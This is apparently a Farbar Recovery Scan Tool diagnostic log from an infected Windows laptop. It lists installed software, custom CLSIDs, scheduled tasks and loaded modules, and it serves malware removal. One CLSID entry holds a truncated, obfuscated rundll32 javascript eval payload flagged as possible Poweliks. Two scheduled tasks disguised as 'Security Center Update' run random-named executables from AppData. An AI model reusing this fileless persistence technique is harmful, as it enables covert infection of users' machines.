ExpressCache (HKLM\...\{3EA6AB5D-D434-4ACA-9609-48F1319518EF}) (Version: 1.0.94 - Condusiv Technologies)
Fast Flash Sleep Resume (x32 Version: 1.1.1 - Samsung) Hidden
FileZilla Client 3.7.1 (HKLM-x32\...\FileZilla Client) (Version: 3.7.1 - FileZilla Project)
FocusWriter (HKLM-x32\...\FocusWriter) (Version: 1.5.1 - Graeme Gott)
Galería de fotos (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Galerie de photos (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 36.0.1985.143 - Google Inc.)
Google Talk (remove only) (HKCU\...\{226b64e8-dc75-4eea-a6c8-abcb496320f2}-Google Talk) (Version:  - )
Google Update Helper (x32 Version: 1.3.24.15 - Google Inc.) Hidden
Grabber version 3.4.1 (HKLM-x32\...\{8C007AE6-3F7D-41CC-AB7C-75C08C276EC8}_is1) (Version: 3.4.1 - Bionus)
Help Desk (HKLM\...\{18BB06D9-8518-48E5-88F7-5AE1DF02546B}) (Version: 1.0.6 - Samsung Electronics CO., LTD.)
HxD Hex Editor version 1.7.7.0 (HKLM-x32\...\HxD Hex Editor_is1) (Version: 1.7.7.0 - Maël Hörz)
Intel AppUp® center (HKLM-x32\...\Intel AppUp(SM) center 33070) (Version: 41450 - Intel)
Intel® Manageability Engine Firmware Recovery Agent (HKLM-x32\...\{A6C48A9F-694A-4234-B3AA-62590B668927}) (Version: 1.0.0.36702 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
Intel® PRO/Wireless Driver (Version: 16.01.5000.0577 - Intel Corporation) Hidden
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.2817 - Intel Corporation)
Intel® PROSet/Wireless for Bluetooth® + High Speed (HKLM\...\{89478C31-5CE8-461A-9084-9A0AF059F84F}) (Version: 15.5.0.0344 - Intel Corporation)
Intel® PROSet/Wireless Software for Bluetooth® Technology (HKLM\...\{7854AA22-A2F0-4F29-A2E9-D0C5A2B685E7}) (Version: 2.5.0.0248 - Motorola Solutions, Inc)
Intel® Rapid Start Technology (HKLM-x32\...\3D073343-CEEB-4ce7-85AC-A69A7631B5D6) (Version: 2.1.0.1002 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.5.2.1001 - Intel Corporation)
Intel® SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
Intel® PROSet/Wireless Software (HKLM-x32\...\{c9967fbd-e3c3-4ed0-992a-5b33260f2944}) (Version: 16.1.5 - Intel Corporation)
Intel® PROSet/Wireless WiFi Software (Version: 16.01.5000.0269 - Intel Corporation) Hidden
Intel® Trusted Connect Service Client (Version: 1.24.388.1 - Intel Corporation) Hidden
iTunes (HKLM\...\{77DE5105-D05E-448C-96CB-7FA381903753}) (Version: 11.3.1.2 - Apple Inc.)
Jarte 4.5 (HKLM-x32\...\Jarte_is1) (Version: 4.5 - Carolina Road Software L.L.C.)
Magic Set Editor 2.0.0 (HKLM-x32\...\Magic Set Editor 2_is1) (Version:  - )
Manga Studio (HKLM-x32\...\{CFA66508-B19D-4032-AB0A-EBBA2BDF1368}) (Version: 5.0.3 - Smith Micro)
Microsoft Application Error Reporting (Version: 12.0.6015.5000 - Microsoft Corporation) Hidden
Microsoft Office (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.6120.5004 - Microsoft Corporation)
Microsoft Office Access MUI (English) 2010 (x32 Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office Access Setup Metadata MUI (English) 2010 (x32 Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (English) 2010 (x32 Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office Groove MUI (English) 2010 (x32 Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office InfoPath MUI (English) 2010 (x32 Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office Office 64-bit Components 2010 (Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (English) 2010 (x32 Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (English) 2010 (x32 Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2010 (x32 Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.4734.1000 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (x32 Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2010 (x32 Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2010 (x32 Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2010 (x32 Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2010 (x32 Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office Publisher MUI (English) 2010 (x32 Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit MUI (English) 2010 (Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010 (Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2010 (x32 Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2010 (x32 Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (English) 2010 (x32 Version: 14.0.4734.1000 - Microsoft Corporation) Hidden
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.50727 (Version: 11.0.50727 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.50727 (Version: 11.0.50727 - Microsoft Corporation) Hidden
Microsoft Visual F# 2.0 Runtime (HKLM-x32\...\{729A3000-BC8A-3B74-BA5D-5068FE12D70C}) (Version: 10.0.30319 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT110 (x32 Version: 16.4.1108.0727 - Microsoft) Hidden
MSVCRT110_amd64 (Version: 16.4.1108.0727 - Microsoft) Hidden
MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
Norton Internet Security (HKLM-x32\...\NIS) (Version: 20.5.0.28 - Symantec Corporation)
Norton Online Backup (HKLM-x32\...\{40A66DF6-22D3-44B5-A7D3-83B118A2C0DC}) (Version: 2.2.3.51 - Symantec Corporation)
Norton Online Backup ARA (x32 Version: 4.1.0.14 - Symantec Corporation) Hidden
PaintTool SAI Ver.1 (HKLM-x32\...\PaintToolSAI) (Version:  - )
Photo Common (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Photo Gallery (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Plants vs. Zombies (HKLM-x32\...\Plants vs. Zombies) (Version:  - PopCap Games)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.2.612.2012 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6699 - Realtek Semiconductor Corp.)
Recovery (HKLM-x32\...\{145DE957-0679-4A2A-BB5C-1D3E9808FAB2}) (Version: 6.0.6.5 - Samsung Electronics CO., LTD.)
Rosetta Stone Version 3 (HKLM-x32\...\{148E08FF-D7C4-46ED-8D4D-601C67FE0AFD}) (Version: 3.3.5.2 - Rosetta Stone Ltd.)
S Agent (Version: 1.0.7 - Samsung Electronics CO., LTD.) Hidden
Scrivener Update (HKLM-x32\...\Scrivener 1600) (Version: 1710 - Literature and Latte)
Settings (HKLM-x32\...\{52E5DE60-C96B-42CC-9A37-FE04725940AE}) (Version: 2.0.0 - Samsung Electronics CO., LTD.)
Skype™ 6.18 (HKLM-x32\...\{7A3C7E05-EE37-47D6-99E1-2EB05A3DA3F7}) (Version: 6.18.106 - Skype Technologies S.A.)
Stencyl (HKLM-x32\...\Stencyl) (Version: 1.1.1 - Stencyl, LLC)
Support Center (HKLM\...\{73280CF7-9471-4FB6-B018-E5FD7A09F1AF}) (Version: 2.0.13 - Samsung Electronics CO., LTD.)
Support Center FAQ (x32 Version: 1.0.5 - Samsung Electronics CO., LTD.) Hidden
SW Update (HKLM-x32\...\{FF007847-0979-417F-8DD0-A2243DA724B9}) (Version: 2.0.21 - Samsung Electronics CO., LTD.)
Trojan Remover 6.9.1 (HKLM-x32\...\Trojan Remover_is1) (Version: 6.9.1 - Simply Super Software)
Twine 1.3.5 (remove only) (HKLM-x32\...\Twine) (Version:  - )
Update for Japanese Microsoft IME Postal Code Dictionary (HKLM-x32\...\{121C874E-5797-40B2-86CE-CE6624F2711A}) (Version: 15.0.1376 - Microsoft Corporation)
Update for Japanese Microsoft IME Standard Extended Dictionary (HKLM-x32\...\{78CE66A9-85AF-4BD8-8FB7-35B5F3846C00}) (Version: 15.0.1215 - Microsoft Corporation)
Update for Microsoft Office 2010 (KB2494150) (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{3FCFD88F-4D13-4F38-8625-ABABEA7F61EA}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760631) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{35698CB7-AAA2-4577-B505-DBFF504AEF23}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2825640) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{BA610006-2C39-4419-9834-CF61AB24810A}) (Version:  - Microsoft)
User Guide (HKLM-x32\...\{3453B656-241C-443B-BDEA-8682459B3FE8}) (Version: 1.2.00 - Samsung Electronics CO., LTD.)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.1.5 - VideoLAN)
Wacom (HKLM\...\Pen Tablet Driver) (Version: 5.3.2-1 - Wacom Technology Corp.)
WebTablet FB Plugin 32 bit (HKLM-x32\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.2 - Wacom Technology Corp.)
WebTablet FB Plugin 64 bit (HKLM\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.2 - Wacom Technology Corp.)
WeSay 1.3.78 (HKLM-x32\...\{8BBEA8C0-A684-4265-8EFF-E2421CE2011A}) (Version: 1.3.78 - SIL)
Windows Driver Package - Samsung Electronics Co. Ltd. (RadioHIDMini) HIDClass  (07/27/2012 20.57.1.735) (HKLM\...\9F04C462DAB591BDCCE784F77E4D4F1736010B92) (Version: 07/27/2012 20.57.1.735 - Samsung Electronics Co. Ltd.)
Windows Live (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live Communications Platform (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3503.0728 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live Installer (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live Photo Common (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live PIMT Platform (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live SOXE (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live SOXE Definitions (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live UX Platform (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live UX Platform Language Pack (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
WinRAR 4.20 (64-bit) (HKLM\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH)
Xerox PhotoCafe (HKLM-x32\...\Xerox PhotoCafe) (Version: 1.0.0.6162 - Xerox)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-421319782-3228657606-2084502403-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Stephen\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-421319782-3228657606-2084502403-1001_Classes\CLSID\{092dfa86-5807-5a94-bf3b-5a53ba9e5308}\InprocServer32 -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll (Wacom)
CustomCLSID: HKU\S-1-5-21-421319782-3228657606-2084502403-1001_Classes\CLSID\{9E506282-69D3-5ABA-9C1D-15994B37F4AC}\InprocServer32 -> C:\Program Files (x86)\Intel\IntelAppStore\bin\npAppUp_x64.dll (Intel)
CustomCLSID: HKU\S-1-5-21-421319782-3228657606-2084502403-1001_Classes\CLSID\{9E506282-69D3-5ABA-9C1D-15994B37F4AD}\InprocServer32 -> C:\Program Files (x86)\Intel\IntelAppStore\bin\npAppUp_x64.dll (Intel)
CustomCLSID: HKU\S-1-5-21-421319782-3228657606-2084502403-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-421319782-3228657606-2084502403-1001_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Stephen\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-421319782-3228657606-2084502403-1001_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Stephen\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-421319782-3228657606-2084502403-1001_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Stephen\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-421319782-3228657606-2084502403-1001_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Stephen\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-421319782-3228657606-2084502403-1001_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Stephen\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-421319782-3228657606-2084502403-1001_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Stephen\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-421319782-3228657606-2084502403-1001_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Stephen\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-421319782-3228657606-2084502403-1001_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Stephen\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
 
==================== Restore Points  =========================
 
19-08-2014 19:08:40 Windows Update
22-08-2014 22:44:55 Windows Update
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2012-07-26 01:26 - 2012-07-26 01:26 - 00000824 ____N C:\windows\system32\Drivers\etc\hosts
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {0CB447B6-F6AC-4C53-9A9E-87F2CCB92AF6} - System32\Tasks\Security Center Update - 436866125 => C:\Users\Stephen\AppData\Roaming\Okodxice\buzoup.exe
Task: {1AAFF332-5C62-4558-9991-DAA649C4C9C5} - System32\Tasks\Microsoft\Windows\Sysmain\WsSwapAssessmentTask => Rundll32.exe sysmain.dll,PfSvWsSwapAssessmentTask
Task: {1C125608-BA76-40CF-8FEA-F223DE03F06F} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon => C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\Bootstrap.exe [2012-06-13] (Intel Corporation)
Task: {23A5D8BE-9196-40EB-BD89-794398B2B073} - System32\Tasks\Microsoft\Windows\WS\WSRefreshBannedAppsListTask => Rundll32.exe WSClient.dll,RefreshBannedAppsList
Task: {27075D08-B8C3-47C0-A54C-F3561298A87C} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d => C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\Bootstrap.exe [2012-06-13] (Intel Corporation)
Task: {37DF2685-CD6F-4EDD-887B-9F06E6B17C5A} - System32\Tasks\Norton Internet Security\Norton Error Analyzer => C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\SymErr.exe [2013-06-03] (Symantec Corporation)
Task: {475346C3-7AF6-438F-A036-B9FB546408FC} - System32\Tasks\FFSRConfigurer => C:\Program Files (x86)\Samsung\Fast Flash Sleep Resume\FFSRConfigurer.exe [2012-08-22] (Samsung)
Task: {4A874836-A08E-4C6C-8941-DA85E9D89463} - System32\Tasks\Security Center Update - 406261607 => C:\Users\Stephen\AppData\Roaming\Niuzdoky\woivomk.exe
Task: {5D8D1AD1-9AF6-4608-92B0-19E3D602FBDA} - System32\Tasks\Adobe Flash Player Updater => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-07-08] (Adobe Systems Incorporated)
Task: {64141CCE-D080-4267-A95A-4147DCBDB3BA} - System32\Tasks\SAgent => C:\Program Files\Samsung\S Agent\CommonAgent.exe [2012-08-17] (Samsung Electronics CO., LTD.)
Task: {6783C526-0787-4F6A-A925-C1A76DF446C0} - System32\Tasks\Settings => C:\Program Files (x86)\Samsung\Settings\sSettings.exe [2012-09-05] (Samsung Electronics CO., LTD.)
Task: {80BE2B4B-D4CD-46A1-9D81-F747B7AD5AF8} - System32\Tasks\Xerox PhotoCafe Communicator => C:\ProgramData\Xerox PhotoCafe\MessageCheck.exe [2011-10-26] ()
Task: {820335D9-ED62-45B0-8E4D-30E896223139} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\WSCStub.exe [2014-04-29] (Symantec Corporation)
Task: {84A39186-CC14-437B-95EB-48293836957D} - System32\Tasks\WLANStartup => C:\Program Files (x86)\Samsung\Easy Settings\WLANStartup.exe
Task: {944318E9-28B6-431A-BF73-CEC7B1FF6195} - System32\Tasks\Intel® Rapid Start Technology Manager => C:\Program Files (x86)\Intel\irstrt\RapidStartConfig.exe [2012-07-19] (Intel)
Task: {A72208BF-7A49-4FB8-B684-252375F3443A} - System32\Tasks\Microsoft\Windows\WS\License Validation => Rundll32.exe WSClient.dll,WSpTLR licensing
Task: {B73A7F30-9108-42D4-8A94-FDB2F113BAA8} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2012-12-27] (Google Inc.)
Task: {BABDAC16-B61B-4E7E-9BD8-C4D6A8804C9C} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2012-12-27] (Google Inc.)
Task: {C6A88F2D-53D2-4805-9D69-443738A1847C} - System32\Tasks\Microsoft\Windows\ApplicationData\CleanupTemporaryState => Rundll32.exe Windows.Storage.ApplicationData.dll,CleanupTemporaryState
Task: {C73AFC26-8403-4000-AA15-E51368A70321} - System32\Tasks\SWUpdateAgent => C:\Program Files (x86)\Samsung\SW Update\SWMAgent.exe [2012-10-05] (Samsung Electronics CO., LTD.)
Task: {CD97239A-27FB-4504-92EE-E7C0E18D2B5A} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-07-23] (Piriform Ltd)
Task: {CF706EC0-C064-4E4C-8B97-79C85EA7DA93} - System32\Tasks\Absolute Reminder => C:\Program Files (x86)\Absolute Software\Absolute Reminder\AbsoluteReminder.exe [2012-05-23] (Absolute Software)
Task: {E3419A0C-2866-4648-BE92-EBECE0962389} - System32\Tasks\Norton Internet Security\Norton Error Processor => C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\SymErr.exe [2013-06-03] (Symantec Corporation)
Task: {EB6E4E82-C5A5-44A4-AAC7-BFF95768B4DA} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {EBF06DEC-4228-4813-AC0C-62821AE4E330} - System32\Tasks\Microsoft\Windows\Application Experience\StartupAppTask => Rundll32.exe Startupscan.dll,SusRunTask
Task: {FBBD6220-84A3-4D31-A726-709537F7FAC9} - System32\Tasks\advRecovery => C:\Program Files\Samsung\Recovery\WCScheduler.exe [2012-09-16] (SEC)
Task: C:\windows\Tasks\Adobe Flash Player Updater.job => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\windows\Tasks\Security Center Update - 406261607.job => C:\Users\Stephen\AppData\Roaming\Niuzdoky\woivomk.exe <==== ATTENTION
Task: C:\windows\Tasks\Security Center Update - 436866125.job => C:\Users\Stephen\AppData\Roaming\Okodxice\buzoup.exe <==== ATTENTION
Task: C:\windows\Tasks\Xerox PhotoCafe Communicator.job => C:\ProgramData\Xerox PhotoCafe\MessageCheck.exe
 
==================== Loaded Modules (whitelisted) =============
 
2012-09-05 03:50 - 2012-09-05 03:50 - 00085112 _____ () C:\Program Files (x86)\Samsung\Settings\CmdServer\EasySettingsCmdServer.exe
2010-01-09 21:17 - 2010-01-09 21:17 - 04254560 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\office.odf
2010-01-21 02:40 - 2010-01-21 02:40 - 08794464 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2013-05-14 16:18 - 2012-12-11 13:07 - 01184640 _____ () C:\Program Files\Tablet\Pen\libxml2.dll
2012-08-17 05:44 - 2012-08-16 00:24 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2014-01-20 14:17 - 2014-01-20 14:17 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-01-20 14:16 - 2014-01-20 14:16 - 01044808 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2012-09-05 03:50 - 2012-09-05 03:50 - 00211064 _____ () C:\Program Files (x86)\Samsung\Settings\CmdServer\WinCRT.dll
2012-09-05 03:50 - 2012-09-05 03:50 - 00028792 _____ () C:\Program Files (x86)\Samsung\Settings\CmdServer\EasySettingsCmdWrapper.dll
2012-09-05 03:50 - 2012-09-05 03:50 - 01012856 _____ () C:\Program Files (x86)\Samsung\Settings\CmdServer\EasySettingsCmd.dll
2012-09-05 03:50 - 2012-09-05 03:50 - 00110712 _____ () C:\Program Files (x86)\Samsung\Settings\CmdServer\EasySettingsBase.dll
2012-09-05 03:50 - 2012-09-05 03:50 - 00056440 _____ () C:\Program Files (x86)\Samsung\Settings\CmdServer\HookDllPS2.dll
2012-09-05 03:50 - 2012-09-05 03:50 - 00026744 _____ () C:\Program Files (x86)\Samsung\Settings\EasySettingsAPI.dll
2012-09-05 03:50 - 2012-09-05 03:50 - 00110712 _____ () C:\Program Files (x86)\Samsung\Settings\EasySettingsBase.dll
2012-09-05 03:50 - 2012-09-05 03:50 - 00060536 _____ () C:\Program Files (x86)\Samsung\Settings\EasyMovieEnhancer.dll
2012-09-05 03:50 - 2012-09-05 03:50 - 00103544 _____ () C:\Program Files (x86)\Samsung\Settings\EasySettingsCmdClient.dll
2014-08-23 13:28 - 2014-08-23 13:28 - 00043008 _____ () c:\users\stephen\appdata\local\temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpzys3gw.dll
2013-08-23 15:01 - 2013-08-23 15:01 - 25100288 _____ () C:\Users\Stephen\AppData\Roaming\Dropbox\bin\libcef.dll
2012-12-27 19:20 - 2012-09-18 15:04 - 00016896 _____ () C:\Program Files (x86)\Intel\IntelAppStore\bin\featureController.dll
2012-12-27 19:20 - 2012-09-18 15:04 - 00062976 _____ () C:\Program Files (x86)\Intel\IntelAppStore\bin\osEvents.dll
2012-12-27 19:20 - 2012-09-18 15:04 - 00322048 _____ () C:\Program Files (x86)\Intel\IntelAppStore\bin\log4cplus.dll
2012-12-27 19:20 - 2012-09-18 15:04 - 00400384 _____ () C:\Program Files (x86)\Intel\IntelAppStore\bin\sqlite3.dll
2012-12-27 19:20 - 2012-09-18 15:04 - 00195584 _____ () C:\Program Files (x86)\Intel\IntelAppStore\bin\libgsoap.dll
2012-12-27 19:20 - 2012-09-18 15:04 - 00020480 _____ () C:\Program Files (x86)\Intel\IntelAppStore\bin\eventsSender.dll
2012-12-27 19:20 - 2012-09-18 15:04 - 00062464 _____ () C:\Program Files (x86)\Intel\IntelAppStore\bin\zlib1.dll
2012-12-27 19:20 - 2012-09-18 15:04 - 00446976 _____ () C:\Program Files (x86)\Intel\IntelAppStore\bin\deviceProfile.dll
2012-12-27 19:20 - 2012-09-18 15:04 - 00064512 _____ () C:\Program Files (x86)\Intel\IntelAppStore\bin\serviceManagerStarter.dll
2013-06-18 16:08 - 2013-06-18 16:08 - 00093696 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext.dll
2014-05-01 16:03 - 2012-05-30 02:51 - 00699280 ____R () C:\PROGRAM FILES (X86)\NORTON INTERNET SECURITY\ENGINE\20.5.0.28\wincfi39.dll
2012-10-29 01:25 - 2012-06-25 14:41 - 01198912 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\ACE.dll
2014-08-14 16:29 - 2014-08-06 23:20 - 00718152 _____ () C:\Program Files (x86)\Google\Chrome\Application\36.0.1985.143\libglesv2.dll
2014-08-14 16:29 - 2014-08-06 23:20 - 00126280 _____ () C:\Program Files (x86)\Google\Chrome\Application\36.0.1985.143\libegl.dll
